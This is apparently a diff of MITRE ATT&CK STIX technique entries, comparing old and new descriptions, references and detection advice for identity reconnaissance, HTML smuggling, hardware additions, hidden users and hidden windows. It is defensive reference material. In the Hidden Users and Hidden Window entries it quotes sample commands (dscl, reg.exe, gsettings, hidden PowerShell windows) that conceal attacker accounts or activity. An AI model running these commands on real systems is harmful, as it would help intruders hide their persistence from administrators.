| external_references | {'source_name': 'Clearing quarantine attribute', 'description': 'Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.', 'url': 'https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/'} | |
| external_references | {'source_name': 'OceanLotus for OS X', 'description': 'Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.', 'url': 'https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update'} | |
| Old Description | New Description |
|---|---|
| Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)'] | |
| x_mitre_data_sources | ['Network Traffic: Network Traffic Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:27:49.579000+00:00 | 2022-04-21 14:39:39.857000+00:00 |
| description | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). |
| external_references[2]['source_name'] | Register Deloitte | Detectify Slack Tokens |
| external_references[2]['description'] | Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/ | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ |
| external_references[3]['source_name'] | Register Uber | GitHub truffleHog |
| external_references[3]['description'] | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020. | Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ | https://github.com/dxa4481/truffleHog |
| external_references[4]['source_name'] | Detectify Slack Tokens | GrimBlog UsernameEnum |
| external_references[4]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021. |
| external_references[4]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/ |
| external_references[5]['source_name'] | Forbes GitHub Creds | Register Uber |
| external_references[5]['description'] | Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020. | McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020. |
| external_references[5]['url'] | https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 | https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/ |
| external_references[6]['source_name'] | GitHub truffleHog | GitHub Gitrob |
| external_references[6]['description'] | Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020. | Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020. |
| external_references[6]['url'] | https://github.com/dxa4481/truffleHog | https://github.com/michenriksen/gitrob |
| external_references[7]['source_name'] | GitHub Gitrob | CNET Leaks |
| external_references[7]['description'] | Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020. | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. |
| external_references[7]['url'] | https://github.com/michenriksen/gitrob | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ |
| external_references[8]['source_name'] | CNET Leaks | Forbes GitHub Creds |
| external_references[8]['description'] | Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020. | Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020. |
| external_references[8]['url'] | https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/ | https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196 |
| x_mitre_detection | Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. | Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Register Deloitte', 'description': "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.", 'url': 'https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/'} |
| Description |
|---|
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:03:12.510000+00:00 | 2022-05-19 16:29:47.637000+00:00 |
| external_references[1]['source_name'] | HTML Smuggling Menlo Security 2020 | Outlflank HTML Smuggling 2018 |
| external_references[1]['description'] | Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021. | Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021. |
| external_references[1]['url'] | https://www.menlosecurity.com/blog/new-attack-alert-duri | https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ |
| external_references[2]['source_name'] | Outlflank HTML Smuggling 2018 | MSTIC NOBELIUM May 2021 |
| external_references[2]['description'] | Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021. | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. |
| external_references[2]['url'] | https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ |
| external_references[3]['source_name'] | MSTIC NOBELIUM May 2021 | HTML Smuggling Menlo Security 2020 |
| external_references[3]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. | Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021. |
| external_references[3]['url'] | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ | https://www.menlosecurity.com/blog/new-attack-alert-duri |
| x_mitre_defense_bypassed[0] | Web content filters | Anti-virus |
| x_mitre_defense_bypassed[1] | Anti-virus | Web Content Filters |
| x_mitre_defense_bypassed[2] | Static file analysis | Static File Analysis |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Krishnan Subramanian, @krish203 | |
| x_mitre_contributors | Vinay Pidathala |
| Old Description | New Description |
|---|---|
| Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others. | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Drive: Drive Creation', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Flow'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. | |
| external_references | CAPEC-440 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-440 | |
| external_references | Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-17 00:28:00.947000+00:00 | 2022-04-28 16:09:12.782000+00:00 |
| description | Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others. | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
| external_references[1]['source_name'] | capec | Ossmann Star Feb 2011 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/440.html | https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html |
| external_references[2]['source_name'] | Ossmann Star Feb 2011 | Aleks Weapons Nov 2015 |
| external_references[2]['description'] | Michael Ossmann. (2011, February 17). Throwing Star LAN Tap. Retrieved March 30, 2018. | Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. |
| external_references[2]['url'] | https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html | https://www.youtube.com/watch?v=lDvf4ScWbcQ |
| external_references[3]['source_name'] | Aleks Weapons Nov 2015 | McMillan Pwn March 2012 |
| external_references[3]['description'] | Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018. | Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018. |
| external_references[3]['url'] | https://www.youtube.com/watch?v=lDvf4ScWbcQ | https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/ |
| external_references[4]['source_name'] | Hak5 RubberDuck Dec 2016 | Frisk DMA August 2016 |
| external_references[4]['description'] | Hak5. (2016, December 7). Stealing Files with the USB Rubber Ducky – USB Exfiltration Explained. Retrieved March 30, 2018. | Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018. |
| external_references[4]['url'] | https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained | https://www.youtube.com/watch?v=fXthwl6ShOg |
| external_references[5]['source_name'] | Frisk DMA August 2016 | capec |
| external_references[5]['url'] | https://www.youtube.com/watch?v=fXthwl6ShOg | https://capec.mitre.org/data/definitions/440.html |
| x_mitre_version | 1.2 | 1.6 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'McMillan Pwn March 2012', 'description': 'Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.', 'url': 'https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/'} |
| Old Description | New Description |
|---|---|
Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system. In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) |
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account)
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manager (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['root', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 20:22:03.625000+00:00 | 2022-04-19 02:31:01.315000+00:00 |
| description | Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.
In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)
In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A) |
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account)
Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manager (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary. |
| external_references[1]['description'] | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020. | Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. |
| external_references[1]['url'] | http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf | https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf |
| external_references[2]['source_name'] | FireEye SMOKEDHAM June 2021 | Apple Support Hide a User Account |
| external_references[2]['description'] | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. | Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html | https://support.apple.com/en-us/HT203998 |
| external_references[3]['source_name'] | US-CERT TA18-074A | FireEye SMOKEDHAM June 2021 |
| external_references[3]['description'] | US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. | FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-074A | https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html |
| x_mitre_data_sources[0] | Command: Command Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | User Account: User Account Metadata |
| x_mitre_data_sources[4] | User Account: User Account Metadata | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Process: Process Creation |
| x_mitre_detection | This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, "hidden" users may still get a home directory and will appear in the authentication logs.
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList key. |
Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs.
Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList key.
In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the Hide500Users key value to TRUE in the /Library/Preferences/com.apple.loginwindow plist file. Monitor the command line for usage of the dscl . create command with the IsHidden attribute set to 1.(Citation: Apple Support Hide a User Account) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Hide GDM User Accounts', 'description': 'Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.', 'url': 'https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/'} | |
| external_references | {'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'} | |
| x_mitre_platforms | Linux |
| Description |
|---|
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 22:49:43.557000+00:00 | 2022-03-15 21:09:43.489000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
